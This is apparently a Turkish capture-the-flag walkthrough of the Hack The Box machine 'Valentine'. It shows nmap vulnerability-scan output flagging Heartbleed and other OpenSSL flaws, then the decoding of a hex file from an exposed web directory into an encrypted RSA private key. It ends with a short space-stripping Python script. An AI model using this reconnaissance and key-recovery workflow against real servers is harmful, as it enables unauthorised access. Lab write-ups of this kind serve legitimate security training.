| Makine Adı | Seviye | OS | Logo |
|---|---|---|---|
| Valentine - HTB | Orta | Linux |
Walkthrough
nmap taraması ile başlayalım.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:5.9p1:
| EDB-ID:21018 10.0 https://vulners.com/exploitdb/EDB-ID:21018 *EXPLOIT*
| CVE-2001-0554 10.0 https://vulners.com/cve/CVE-2001-0554
| EDB-ID:40888 7.8 https://vulners.com/exploitdb/EDB-ID:40888 *EXPLOIT*
| CVE-2016-6244 7.8 https://vulners.com/cve/CVE-2016-6244
| EDB-ID:41173 7.2 https://vulners.com/exploitdb/EDB-ID:41173 *EXPLOIT*
| CVE-2016-6241 7.2 https://vulners.com/cve/CVE-2016-6241
| CVE-2016-6240 7.2 https://vulners.com/cve/CVE-2016-6240
| SSV:60656 5.0 https://vulners.com/seebug/SSV:60656 *EXPLOIT*
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
| CVE-2016-6522 4.9 https://vulners.com/cve/CVE-2016-6522
| CVE-2016-6350 4.9 https://vulners.com/cve/CVE-2016-6350
| CVE-2016-6247 4.9 https://vulners.com/cve/CVE-2016-6247
| CVE-2016-6246 4.9 https://vulners.com/cve/CVE-2016-6246
| CVE-2016-6245 4.9 https://vulners.com/cve/CVE-2016-6245
| CVE-2016-6243 4.9 https://vulners.com/cve/CVE-2016-6243
| CVE-2016-6242 4.9 https://vulners.com/cve/CVE-2016-6242
| CVE-2016-6239 4.9 https://vulners.com/cve/CVE-2016-6239
| SSV:90447 4.6 https://vulners.com/seebug/SSV:90447 *EXPLOIT*
| EDB-ID:45233 4.6 https://vulners.com/exploitdb/EDB-ID:45233 *EXPLOIT*
| EDB-ID:45210 4.6 https://vulners.com/exploitdb/EDB-ID:45210 *EXPLOIT*
| EDB-ID:45001 4.6 https://vulners.com/exploitdb/EDB-ID:45001 *EXPLOIT*
| EDB-ID:45000 4.6 https://vulners.com/exploitdb/EDB-ID:45000 *EXPLOIT*
| EDB-ID:40963 4.6 https://vulners.com/exploitdb/EDB-ID:40963 *EXPLOIT*
| EDB-ID:40962 4.6 https://vulners.com/exploitdb/EDB-ID:40962 *EXPLOIT*
| CVE-2016-0778 4.6 https://vulners.com/cve/CVE-2016-0778
| MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ *EXPLOIT*
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2007-2768 4.3 https://vulners.com/cve/CVE-2007-2768
| MSF:ILITIES/UBUNTU-CVE-2016-0777/ 4.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2016-0777/ *EXPLOIT*
| MSF:ILITIES/IBM-AIX-CVE-2016-0777/ 4.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-AIX-CVE-2016-0777/ *EXPLOIT*
| MSF:ILITIES/DEBIAN-CVE-2016-0777/ 4.0 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2016-0777/ *EXPLOIT*
| MSF:ILITIES/AIX-7.2-OPENSSH_ADVISORY7_CVE-2016-0777/ 4.0 https://vulners.com/metasploit/MSF:ILITIES/AIX-7.2-OPENSSH_ADVISORY7_CVE-2016-0777/ *EXPLOIT*
| MSF:ILITIES/AIX-7.1-OPENSSH_ADVISORY7_CVE-2016-0777/ 4.0 https://vulners.com/metasploit/MSF:ILITIES/AIX-7.1-OPENSSH_ADVISORY7_CVE-2016-0777/ *EXPLOIT*
| MSF:ILITIES/AIX-5.3-OPENSSH_ADVISORY7_CVE-2016-0777/ 4.0 https://vulners.com/metasploit/MSF:ILITIES/AIX-5.3-OPENSSH_ADVISORY7_CVE-2016-0777/ *EXPLOIT*
|_ CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_ /index/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:apache:http_server:2.2.22:
| SSV:60913 7.5 https://vulners.com/seebug/SSV:60913 *EXPLOIT*
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CVE-2013-2249 7.5 https://vulners.com/cve/CVE-2013-2249
| MSF:ILITIES/UBUNTU-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1312/ *EXPLOIT*
| MSF:ILITIES/LINUXRPM-RHSA-2013-1012/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1012/ *EXPLOIT*
| MSF:ILITIES/LINUXRPM-RHSA-2013-1011/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1011/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ *EXPLOIT*
| MSF:ILITIES/CENTOS_LINUX-CVE-2017-17790/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-17790/ *EXPLOIT*
| MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ *EXPLOIT*
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| MSF:ILITIES/LINUXRPM-RHSA-2013-1208/ 5.4 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1208/ *EXPLOIT*
| MSF:ILITIES/LINUXRPM-RHSA-2013-1207/ 5.4 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1207/ *EXPLOIT*
| SSV:60788 5.1 https://vulners.com/seebug/SSV:60788 *EXPLOIT*
| CVE-2013-1862 5.1 https://vulners.com/cve/CVE-2013-1862
| SSV:96537 5.0 https://vulners.com/seebug/SSV:96537 *EXPLOIT*
| SSV:62058 5.0 https://vulners.com/seebug/SSV:62058 *EXPLOIT*
| SSV:61874 5.0 https://vulners.com/seebug/SSV:61874 *EXPLOIT*
| MSF:ILITIES/SUSE-CVE-2014-0231/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2014-0231/ *EXPLOIT*
| MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED 5.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED *EXPLOIT*
| EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D 5.0 https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D *EXPLOIT*
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098
| CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438
| CVE-2013-5704 5.0 https://vulners.com/cve/CVE-2013-5704
| 1337DAY-ID-28573 5.0 https://vulners.com/zdt/1337DAY-ID-28573 *EXPLOIT*
| SSV:60905 4.3 https://vulners.com/seebug/SSV:60905 *EXPLOIT*
| SSV:60657 4.3 https://vulners.com/seebug/SSV:60657 *EXPLOIT*
| SSV:60653 4.3 https://vulners.com/seebug/SSV:60653 *EXPLOIT*
| SSV:60345 4.3 https://vulners.com/seebug/SSV:60345 *EXPLOIT*
| MSF:ILITIES/SUSE-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2012-4558/ *EXPLOIT*
| MSF:ILITIES/SUSE-CVE-2012-3499/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2012-3499/ *EXPLOIT*
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2012-4558/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2012-3499/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2012-3499/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/ *EXPLOIT*
| MSF:ILITIES/HPUX-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HPUX-CVE-2012-4558/ *EXPLOIT*
| MSF:ILITIES/CENTOS_LINUX-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2012-4558/ *EXPLOIT*
| MSF:ILITIES/CENTOS_LINUX-CVE-2012-3499/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2012-3499/ *EXPLOIT*
| MSF:ILITIES/APACHE-HTTPD-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2012-4558/ *EXPLOIT*
| MSF:ILITIES/APACHE-HTTPD-CVE-2012-3499/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2012-3499/ *EXPLOIT*
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2013-1896 4.3 https://vulners.com/cve/CVE-2013-1896
| CVE-2012-4558 4.3 https://vulners.com/cve/CVE-2012-4558
| CVE-2012-3499 4.3 https://vulners.com/cve/CVE-2012-3499
| CVE-2012-2687 2.6 https://vulners.com/cve/CVE-2012-2687
|_ EDB-ID:42745 0.0 https://vulners.com/exploitdb/EDB-ID:42745 *EXPLOIT*
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_ /index/: Potentially interesting folder
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| http://www.openssl.org/news/secadv_20140605.txt
|_ http://www.cvedetails.com/cve/2014-0224
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| http://www.openssl.org/news/secadv_20140407.txt
| http://cvedetails.com/cve/2014-0160/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://www.securityfocus.com/bid/70574
|_sslv2-drown:
| vulners:
| cpe:/a:apache:http_server:2.2.22:
| SSV:60913 7.5 https://vulners.com/seebug/SSV:60913 *EXPLOIT*
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CVE-2013-2249 7.5 https://vulners.com/cve/CVE-2013-2249
| MSF:ILITIES/UBUNTU-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1312/ *EXPLOIT*
| MSF:ILITIES/LINUXRPM-RHSA-2013-1012/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1012/ *EXPLOIT*
| MSF:ILITIES/LINUXRPM-RHSA-2013-1011/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1011/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ *EXPLOIT*
| MSF:ILITIES/CENTOS_LINUX-CVE-2017-17790/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-17790/ *EXPLOIT*
| MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ *EXPLOIT*
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| MSF:ILITIES/LINUXRPM-RHSA-2013-1208/ 5.4 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1208/ *EXPLOIT*
| MSF:ILITIES/LINUXRPM-RHSA-2013-1207/ 5.4 https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-1207/ *EXPLOIT*
| SSV:60788 5.1 https://vulners.com/seebug/SSV:60788 *EXPLOIT*
| CVE-2013-1862 5.1 https://vulners.com/cve/CVE-2013-1862
| SSV:96537 5.0 https://vulners.com/seebug/SSV:96537 *EXPLOIT*
| SSV:62058 5.0 https://vulners.com/seebug/SSV:62058 *EXPLOIT*
| SSV:61874 5.0 https://vulners.com/seebug/SSV:61874 *EXPLOIT*
| MSF:ILITIES/SUSE-CVE-2014-0231/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2014-0231/ *EXPLOIT*
| MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED 5.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED *EXPLOIT*
| EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D 5.0 https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D *EXPLOIT*
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098
| CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438
| CVE-2013-5704 5.0 https://vulners.com/cve/CVE-2013-5704
| 1337DAY-ID-28573 5.0 https://vulners.com/zdt/1337DAY-ID-28573 *EXPLOIT*
| SSV:60905 4.3 https://vulners.com/seebug/SSV:60905 *EXPLOIT*
| SSV:60657 4.3 https://vulners.com/seebug/SSV:60657 *EXPLOIT*
| SSV:60653 4.3 https://vulners.com/seebug/SSV:60653 *EXPLOIT*
| SSV:60345 4.3 https://vulners.com/seebug/SSV:60345 *EXPLOIT*
| MSF:ILITIES/SUSE-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2012-4558/ *EXPLOIT*
| MSF:ILITIES/SUSE-CVE-2012-3499/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2012-3499/ *EXPLOIT*
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2012-4558/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2012-3499/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2012-3499/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/ *EXPLOIT*
| MSF:ILITIES/HPUX-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HPUX-CVE-2012-4558/ *EXPLOIT*
| MSF:ILITIES/CENTOS_LINUX-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2012-4558/ *EXPLOIT*
| MSF:ILITIES/CENTOS_LINUX-CVE-2012-3499/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2012-3499/ *EXPLOIT*
| MSF:ILITIES/APACHE-HTTPD-CVE-2012-4558/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2012-4558/ *EXPLOIT*
| MSF:ILITIES/APACHE-HTTPD-CVE-2012-3499/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2012-3499/ *EXPLOIT*
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2013-1896 4.3 https://vulners.com/cve/CVE-2013-1896
| CVE-2012-4558 4.3 https://vulners.com/cve/CVE-2012-4558
| CVE-2012-3499 4.3 https://vulners.com/cve/CVE-2012-3499
| CVE-2012-2687 2.6 https://vulners.com/cve/CVE-2012-2687
|_ EDB-ID:42745 0.0 https://vulners.com/exploitdb/EDB-ID:42745 *EXPLOIT*
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
ssl-heartbleed açıkçası bunu en son denedim. Bu zafiyeti bilmeyenler için kısaca açıklayayim hedef sunucunun belleinden (sanırım 64kb'dı) veri okumunza izin sebep oluyor. Bir çok şey denedikten sonra bu zafiyete odaklandım.
http://10.10.10.79/dev/hype_key adresinde hex formatında bir veri vardı. Bu veriyi bupr decode ile asci formatına dönüştürünce bir anahtar elde ettim.
┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# cat key
- - - - - B E G I N R S A P R I V A T E K E Y - - - - -
P r o c - T y p e : 4 , E N C R Y P T E D
D E K - I n f o : A E S - 1 2 8 - C B C , A E B 8 8 C 1 4 0 F 6 9 B F 2 0 7 4 7 8 8 D E 2 4 A E 4 8 D 4 6
D b P r O 7 8 k e g N u k 1 D A q l A N 5 j b j X v 0 P P s o g 3 j d b M F S 8 i E 9 p 3 U O L 0 l F 0 x f 7 P z m r k D a 8 R
5 y / b 4 6 + 9 n E p C M f T P h N u J R c W 2 U 2 g J c O F H + 9 R J D B C 5 U J M U S 1 / g j B / 7 / M y 0 0 M w x + a I 6
0 E I 0 S b O Y U A V 1 W 4 E V 7 m 9 6 Q s Z j r w J v n j V a f m 6 V s K a T P B H p u g c A S v M q z 7 6 W 6 a b R Z e X i
E b w 6 6 h j F m A u 4 A z q c M / k i g N R F P Y u N i X r X s 1 w / d e L C q C J + E a 1 T 8 z l a s 6 f c m h M 8 A + 8 P
O X B K N e 6 l 1 7 h K a T 6 w F n p 5 e X O a U I H v H n v O 6 S c H V W R r Z 7 0 f c p c p i m L 1 w 1 3 T g d d 2 A i G d
p H L J p Y U I I 5 P u O 6 x + L S 8 n 1 r / G W M q S O E i m N R D 1 j / 5 9 / 4 u 3 R O r T C K e o 9 D s T R q s 2 k 1 S H
Q d W w F w a X b Y y T 1 u x A M S l 5 H q 9 O D 5 H J 8 G 0 R 6 J I 5 R v C N U Q j w x 0 F I T j j M j n L I p x j v f q + E
p 0 g D 0 U c y l K m 6 r C Z q a c w n S d d H W 8 W 3 L x J m C x d x W 5 l t 5 d P j A k B Y R U n l 9 1 E S C i D 4 Z + u C
O l 6 j L F D 2 k a O L f u y e e 0 f Y C b 7 G T q O e 7 E m M B 3 f G I w S d W 8 O C 8 N W T k w p j c 0 E L b l U a 6 u l O
t 9 g r S o s R T C s Z d 1 4 O P t s 4 b L s p K x M M O s g n K l o X v n l P O S w S p W y 9 W p 6 y 8 X X 8 + F 4 0 r x l 5
X q h D U B h y k 1 C 3 Y P O i D u P O n M X a I p e 1 d g b 0 N d D 1 M 9 Z Q S N U L w 1 D H C G P P 4 J S S x X 7 B W d D K
a A n W J v F g l A 4 o F B B V A 8 u A P M f V 2 X F Q n j w U T 5 b P L C 6 5 t F s t o R t T Z 1 u S r u a i 2 7 k x T n L Q
+ w Q 8 7 l M a d d s 1 G Q N e G s K S f 8 R / r s R K e e K c i l D e P C j e a L q t q x n h N o F t g 0 M x t 6 r 2 g b 1 E
A l o Q 6 j g 5 T b j 5 J 7 q u Y X Z P y l B l j N p 9 G V p i n P c 3 K p H t t v g b p t f i W E E s Z Y n 5 y Z P h U r 9 Q
r 0 8 p k O x A r X E 2 d j 7 e X + b q 6 5 6 3 5 O J 6 T q H b A l T Q 1 R s 9 P u l r S 7 K 4 S L X 7 n Y 8 9 / R Z 5 o S Q e
2 V W R y T Z 1 F f n g J S s v 9 + M f v z 3 4 1 l b z O I W m k 7 W f E c W c H c 1 6 n 9 V 0 I b S N A L n j T h v E c P k y
e 1 B s f S b s f 9 F g u U Z k g H A n n f R K k G V G 1 O V y u w c / L V j m b h Z z K w L h a Z R N d 8 H E M 8 6 f N o j P
0 9 n V j T a Y t W U X k 0 S i 1 W 0 2 w b u 1 N z L + 1 T g 9 I p N y I S F C F Y j S q i y G + W U 7 I w K 3 Y U 5 k p 3 C C
d Y S c z 6 3 Q 2 p Q a f x f S b u v 4 C M n N p d i r V K E o 5 n R R f K / i a L 3 X 1 R 3 D x V 8 e S Y F K F L 6 p q p u X
c Y 5 Y Z J G A p + J x s n I Q 9 C F y x I t 9 2 f r X z n s j h l Y a 8 s v b V N N f k / 9 f y X 6 o p 2 4 r L 2 D y E S p Y
p n s u k B C F B k Z H W N N y e N 7 b 5 G h T V C o d H h z H V F e h T u B r p + V u P q a q D v M C V e 1 D Z C b 4 M j A j
M s l f + 9 x K + T X E L 3 i c m I O B R d P y w 6 e / J l Q l V R l m S h F p I 8 e b / 8 V s T y J S e + b 8 5 3 z u V 2 q L
s u L a B M x Y K m 3 + z E D I D v e K P N a a W Z g E c q x y l C C / w U y U X l M J 5 0 N w 6 J N V M M 8 L e C i i 3 O E W
l 0 l n 9 L 1 b / N X p H j G a 8 W H H T j o I i l B 5 q N U y y w S e T B F 2 a w R l X H 9 B r k Z G 4 F c 4 g d m W / I z T
R U g Z k b M Q Z N I I f z j 1 Q u i l R V B m / F 7 6 Y / Y M r m n M 9 k / 1 x S G I s k w C U Q + 9 5 C G H J E 8 M k h D 3
- - - - - E N D R S A P R I V A T E K E Y - - - - -
┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# cat convert.py
dosya = open("key")
key = dosya.read().split("\n")
dosya.close()
for i in key:
text = i.replace(" ","")
if(text != ""):
print(text)
┌──(root💀kali)-[~/oscp/htb/Valentine]
└─# python3 convert.py
-----BEGINRSAPRIVATEKEY-----
Proc-Type:4,ENCRYPTED
DEK-Info:AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
